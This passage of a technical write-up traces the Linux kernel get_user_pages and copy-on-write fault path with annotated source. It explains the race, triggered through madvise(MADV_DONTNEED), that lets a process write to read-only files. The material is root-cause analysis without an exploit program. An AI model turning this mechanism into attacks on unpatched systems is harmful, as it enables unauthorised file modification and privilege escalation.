if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;
start += page_increm * PAGE_SIZE;
nr_pages -= page_increm;
} while (nr_pages);
return i;
}
EXPORT_SYMBOL(__get_user_pages);

A few key points:

  • When the access flags foll_flags demand permissions that the page does not grant, follow_page_mask returns NULL, which triggers the call to faultin_page;

  • follow_page_mask walks the page tables to find the physical page behind a virtual address, descending the four levels of the Linux page-table hierarchy in turn;

    struct page *follow_page_mask(struct vm_area_struct *vma,
    unsigned long address, unsigned int flags,
    unsigned int *page_mask)
    {
    pgd_t *pgd;
    pud_t *pud;
    pmd_t *pmd;
    spinlock_t *ptl;
    struct page *page;
    struct mm_struct *mm = vma->vm_mm;

    *page_mask = 0;

    page = follow_huge_addr(mm, address, flags & FOLL_WRITE);
    if (!IS_ERR(page)) {
    BUG_ON(flags & FOLL_GET);
    return page;
    }

    pgd = pgd_offset(mm, address);
    if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
    return no_page_table(vma, flags);

    pud = pud_offset(pgd, address);
    if (pud_none(*pud))
    return no_page_table(vma, flags);
    if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) {
    page = follow_huge_pud(mm, address, pud, flags);
    if (page)
    return page;
    return no_page_table(vma, flags);
    }
    if (unlikely(pud_bad(*pud)))
    return no_page_table(vma, flags);

    pmd = pmd_offset(pud, address);
    if (pmd_none(*pmd))
    return no_page_table(vma, flags);
    if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
    page = follow_huge_pmd(mm, address, pmd, flags);
    if (page)
    return page;
    return no_page_table(vma, flags);
    }
    if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
    return no_page_table(vma, flags);
    if (pmd_trans_huge(*pmd)) {
    if (flags & FOLL_SPLIT) {
    split_huge_page_pmd(vma, address, pmd);
    return follow_page_pte(vma, address, pmd, flags);
    }
    ptl = pmd_lock(mm, pmd);
    if (likely(pmd_trans_huge(*pmd))) {
    if (unlikely(pmd_trans_splitting(*pmd))) {
    spin_unlock(ptl);
    wait_split_huge_page(vma->anon_vma, pmd);
    } else {
    page = follow_trans_huge_pmd(vma, address,
    pmd, flags);
    spin_unlock(ptl);
    *page_mask = HPAGE_PMD_NR - 1;
    return page;
    }
    } else
    spin_unlock(ptl);
    }
    return follow_page_pte(vma, address, pmd, flags);
    }

    first page fault

    The first call to follow_page_mask returns NULL because no corresponding physical page exists yet, i.e. the page is missing, so the page-fault machinery is triggered to allocate one;

    static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
    unsigned long address, unsigned int *flags, int *nonblocking)

    int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
    unsigned long address, unsigned int flags)

    static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
    unsigned long address, unsigned int flags)

    static int handle_pte_fault(struct mm_struct *mm,
    struct vm_area_struct *vma, unsigned long address,
    pte_t *pte, pmd_t *pmd, unsigned int flags)

    /*
    * These routines also need to handle stuff like marking pages dirty
    * and/or accessed for architectures that don't do it in hardware (most
    * RISC architectures). The early dirtying is also good on the i386.
    *
    * There is also a hook called "update_mmu_cache()" that architectures
    * with external mmu caches can use to update those (ie the Sparc or
    * PowerPC hashed page tables that act as extended TLBs).
    *
    * We enter with non-exclusive mmap_sem (to exclude vma changes,
    * but allow concurrent faults), and pte mapped but not yet locked.
    * We return with pte unmapped and unlocked.
    *
    * The mmap_sem may have been released depending on flags and our
    * return value. See filemap_fault() and __lock_page_or_retry().
    */
    static int handle_pte_fault(struct mm_struct *mm,
    struct vm_area_struct *vma, unsigned long address,
    pte_t *pte, pmd_t *pmd, unsigned int flags)
    {
    pte_t entry;
    spinlock_t *ptl;

    /*
    * some architectures can have larger ptes than wordsize,
    * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
    * so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
    * The code below just needs a consistent view for the ifs and
    * we later double check anyway with the ptl lock held. So here
    * a barrier will do.
    */
    entry = *pte;
    barrier();
    if (!pte_present(entry)) { // is the PTE present, i.e. is the page missing?
    if (pte_none(entry)) { // the page is missing
    if (vma_is_anonymous(vma)) // anonymous vma (heap, stack, data segment, etc.), not backed by a file
    return do_anonymous_page(mm, vma, address, // create an anonymous page
    pte, pmd, flags);
    else
    return do_fault(mm, vma, address, pte, pmd, // not anonymous: call do_fault()
    flags, entry);
    }
    return do_swap_page(mm, vma, address, // swap the page back in
    pte, pmd, flags, entry);
    }

    if (pte_protnone(entry))
    return do_numa_page(mm, vma, address, entry, pte, pmd);

    ptl = pte_lockptr(mm, pmd);
    spin_lock(ptl);
    if (unlikely(!pte_same(*pte, entry)))
    goto unlock;
    if (flags & FAULT_FLAG_WRITE) { // the PTE is present and this is a write
    if (!pte_write(entry)) // but the PTE is not writable
    return do_wp_page(mm, vma, address, // perform COW via do_wp_page()
    pte, pmd, ptl, entry);
    entry = pte_mkdirty(entry);
    }
    entry = pte_mkyoung(entry);
    if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
    update_mmu_cache(vma, address, pte);
    } else {
    /*
    * This is needed only for protection faults but the arch code
    * is not yet telling us if this is a protection fault or not.
    * This still avoids useless tlb flushes for .text page faults
    * with threads.
    */
    if (flags & FAULT_FLAG_WRITE)
    flush_tlb_fix_spurious_fault(vma, address);
    }
    unlock:
    pte_unmap_unlock(pte, ptl);
    return 0;
    }

    Now look at how do_fault handles this;

    /*
    * We enter with non-exclusive mmap_sem (to exclude vma changes,
    * but allow concurrent faults).
    * The mmap_sem may have been released depending on flags and our
    * return value. See filemap_fault() and __lock_page_or_retry().
    */
    static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
    unsigned long address, pte_t *page_table, pmd_t *pmd,
    unsigned int flags, pte_t orig_pte)
    {
    pgoff_t pgoff = (((address & PAGE_MASK)
    - vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;

    pte_unmap(page_table);
    /* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
    if (!vma->vm_ops->fault)
    return VM_FAULT_SIGBUS;
    if (!(flags & FAULT_FLAG_WRITE)) // no write intent:
    return do_read_fault(mm, vma, address, pmd, pgoff, flags, // do_read_fault maps the file directly, no COW
    orig_pte);
    if (!(vma->vm_flags & VM_SHARED)) // not a shared mapping, i.e. a private COW mapping being written
    return do_cow_fault(mm, vma, address, pmd, pgoff, flags, // call do_cow_fault
    orig_pte);
    return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
    }

    再跟踪看看do_cow_fault

    static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
    unsigned long address, pmd_t *pmd,
    pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
    {
    struct page *fault_page, *new_page;
    struct mem_cgroup *memcg;
    spinlock_t *ptl;
    pte_t *pte;
    int ret;
    // ...

    new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);
    if (!new_page)
    return VM_FAULT_OOM;
    // ...
    ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
    if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
    goto uncharge_out;

    if (fault_page)
    copy_user_highpage(new_page, fault_page, address, vma);
    __SetPageUptodate(new_page);
    // ...
    do_set_pte(vma, address, new_page, pte, true, true); // install the PTE for the new page via do_set_pte
    mem_cgroup_commit_charge(new_page, memcg, false);
    lru_cache_add_active_or_unevictable(new_page, vma);
    pte_unmap_unlock(pte, ptl);
    if (fault_page) {
    unlock_page(fault_page);
    page_cache_release(fault_page);
    } else {
    /*
    * The fault handler has no page to lock, so it holds
    * i_mmap_lock for read to protect against truncate.
    */
    i_mmap_unlock_read(vma->vm_file->f_mapping);
    }
    return ret;
    // ...

    跟踪do_set_pte

    void do_set_pte(struct vm_area_struct *vma, unsigned long address,
    struct page *page, pte_t *pte, bool write, bool anon)
    {
    pte_t entry;

    flush_icache_page(vma, page);
    entry = mk_pte(page, vma->vm_page_prot);
    if (write) // if this was a write fault
    entry = maybe_mkwrite(pte_mkdirty(entry), vma); // pte_mkdirty marks the page dirty; maybe_mkwrite sets the write bit only if VM_WRITE is set in the vma's vm_flags
    // ...
    }

    /*
    static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
    {
    if (likely(vma->vm_flags & VM_WRITE))
    pte = pte_mkwrite(pte); // pte_mkwrite() is called here
    return pte;
    }
    */

    /*
    static inline pte_t pte_mkdirty(pte_t pte)
    {
    return pte_set_flags(pte, _PAGE_DIRTY | _PAGE_SOFT_DIRTY); // mark the page dirty
    }
    */

The vulnerability lies in get_user_pages, the function that resolves the physical pages behind a user process's virtual addresses. The caller declares what it intends to do with them (write, lock, etc.) so memory management can prepare the appropriate pages. Concretely, a write to a privately mapped page goes through COW (copy-on-write): the read-only page is duplicated into a new page with write permission. The original page may be private and write-protected, yet still be mapped by other processes. After COW the user can modify the new page's contents, and with this bug the modification can end up written back to the file on disk.

The purpose of the whole while loop is to obtain each page in the requested range, repeating until every required mapping has been built; this is what the retry label is for;

follow_page_mask reads the page tables to fetch the physical page at the given address (as the PTE permits) or to learn that the request cannot be satisfied;

During follow_page_mask the PTE spinlock is taken, protecting the physical page being fetched from being freed;

faultin_page acquires the memory-management machinery (also under the PTE spinlock) to handle the fault at the target address;

After a successful faultin_page the lock is released, so follow_page_mask can make its next attempt; the relevant code is shown below.

Normally, removing FOLL_WRITE after the COW is fine: at that point the page the VMA points to is the freshly copied, writable COW page, so skipping the later write-permission check does no harm. But consider what happens if, at exactly this moment, the user throws away the freshly allocated page with madvise(MADV_DONTNEED): the follow_page_mask call that should have succeeded after faultin_page fails again, and the code drops back into the faultin_page logic. This time, however, the FOLL_WRITE permission check is gone and only readability is checked, so the kernel maps the read-only page straight into our address space. The page the VMA points to is now not a COW copy but the file's original page, and we have gained the ability to write to an arbitrary file.

Page-Fault Handling

  1. The hardware traps into the kernel, saving the program counter on the stack. Most machines also save assorted state about the current instruction in special CPU registers.

  2. An assembly routine is started to save the general-purpose registers and other volatile state, so the operating system cannot destroy it. The routine then calls the operating system as if it were a function.

  3. When the operating system discovers a page fault, it tries to work out which virtual page is needed. Usually a hardware register contains this information; if not, the operating system must retrieve the program counter, fetch the instruction, and decode it in software to see what it was doing when the fault hit.

  4. Once the faulting virtual address is known, the operating system checks that the address is valid and that the access is consistent with the protection. If not, the process is sent a signal or killed. If the address is valid and no protection fault occurred, the system checks for a free page frame; if none is free, the page-replacement algorithm picks a page to evict.

  5. If the chosen frame is dirty, the page is scheduled for write-back to disk and a context switch takes place, suspending the faulting process and letting other processes run until the disk transfer finishes. In any case, the frame is marked busy so it is not claimed by another process in the meantime.

  6. As soon as the frame is clean (immediately, or after write-back), the operating system looks up the disk address of the needed page and schedules a disk operation to load it. While the page is loading, the faulting process remains suspended, and another runnable user process may be scheduled.

  7. When the disk interrupt indicates the page has arrived, the page tables are updated to reflect its position, and the frame is marked as being in the normal state.

  8. The faulting instruction is backed up to the state it had when it began, and the program counter is reset to point to it.

  9. The faulting process is scheduled, and the operating system returns to the assembly routine that called it.

  10. That routine restores the registers and other state information and returns to user space to continue execution, as if the page fault had never happened.
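
From user space, the visible face of this machinery is SIGSEGV: when the fault cannot be satisfied (step 4 above), the process receives a signal carrying the faulting address. A tiny sketch (my own example; printf in a signal handler is not async-signal-safe, which is acceptable for a demo):

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

/* an access the kernel cannot satisfy is delivered as SIGSEGV,
 * together with the faulting address in si_addr */
static void handler(int sig, siginfo_t *info, void *ctx)
{
    (void)sig; (void)ctx;
    printf("fault at address %p\n", info->si_addr);
    exit(0);
}

int main(void)
{
    struct sigaction sa = { 0 };
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = handler;
    sigaction(SIGSEGV, &sa, NULL);

    volatile char *bad = (char *)0xdead000;
    *bad = 1;   /* invalid access: runs the page-fault path, then SIGSEGV */
    return 0;
}

The annotated call flow below summarizes the kernel path once more: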

get_user_pages{ // this is just a wrapper
...
return __get_user_pages() // the core routine for pinning user memory
...
}
__get_user_pages(vma,...,int flag,...){
...
retry:
...
page = follow_page_mask(...,flag,...); // look up the page table entry
if (!page) {
int ret;
ret = faultin_page(vma,...); // called when the lookup fails
switch (ret) {
case 0: // a return of 0 means retry: this forms a loop
goto retry;
...

}
}
follow_page_mask(...,flag,...){
// walks the classic paged-memory hierarchy: first-level directory -> second-level directory -> page table entry
...
return follow_page_pte(...,flag,...); // step three of the walk: look up the PTE
...
}
follow_page_pte(...,flag,...){
...
// if the lookup requires the mapping to be writable but the PTE's page has no write permission, return NULL
if ((flags & FOLL_WRITE) && !pte_write(pte)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}

// a lookup that does not require write permission returns the page
return pages;
...
}
faultin_page(vma,){
...
// handle the page fault
ret = handle_mm_fault();
// this matches the check in follow_page_pte: if the lookup failed because the mapping lacks write permission, FOLL_WRITE is dropped from flags, so the next lookup no longer requires the mapping to be writable
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
...
return 0
}
handle_mm_fault(){
__handle_mm_fault()
}
__handle_mm_fault(){
handle_pte_fault()
}
handle_pte_fault(){
// the PTE is empty, i.e. the page is missing: call do_fault to page it in
if (!fe->pte) {
...
return do_fault(fe);
}
// the PTE exists, but the page being written lacks write permission: COW may be needed
if (fe->flags & FAULT_FLAG_WRITE) {
if (!pte_write(entry))
return do_wp_page(fe, entry);
...
}
}
do_fault(fe){
// a fault without write intent on the target memory: the kernel does not perform COW or create a copy
if (!(fe->flags & FAULT_FLAG_WRITE))
return do_read_fault(fe, pgoff);
// a write fault on a private (non-VM_SHARED) mapping: the kernel performs COW and creates a copy
if (!(vma->vm_flags & VM_SHARED))
return do_cow_fault(fe, pgoff);
}
do_cow_fault(fe,pgoff){
// perform the COW and update the PTE to point at the copy
new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);
...
// __do_fault brings the file's backing page into memory (fault_page)
ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);
...
copy_user_highpage(new_page, fault_page, fe->address, vma);
ret |= alloc_set_pte(fe, memcg, new_page);
...
return ret
}
do_read_fault(fe,pgoff){
...
// no COW: map the file directly
__do_fault(fe, pgoff, NULL, &fault_page, NULL);
...
ret |= alloc_set_pte(fe, NULL, fault_page);
...
ret
}
alloc_set_pte(fe,...){
bool write = fe->flags & FAULT_FLAG_WRITE;
// if COW was performed, the PTE is marked dirty when set, but not writable
if (write)
entry = maybe_mkwrite(pte_mkdirty(entry), vma);
}
do_wp_page(fe,entry){
....
// the kernel's checks find that COW already happened during fault handling, so instead of doing COW again it reuses the PTE obtained from the earlier COW
return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
}
wp_page_reuse(){
// mark the page dirty, but not writable
entry = maybe_mkwrite(pte_mkdirty(entry), vma);
}
maybe_mkwrite(){
// this is why maybe_mkwrite does not mark the page writable: the page belongs to a read-only vma, so the if condition is not met
if (likely(vma->vm_flags & VM_WRITE))
pte = pte_mkwrite(pte);
return pte;
}

Reference: anquanke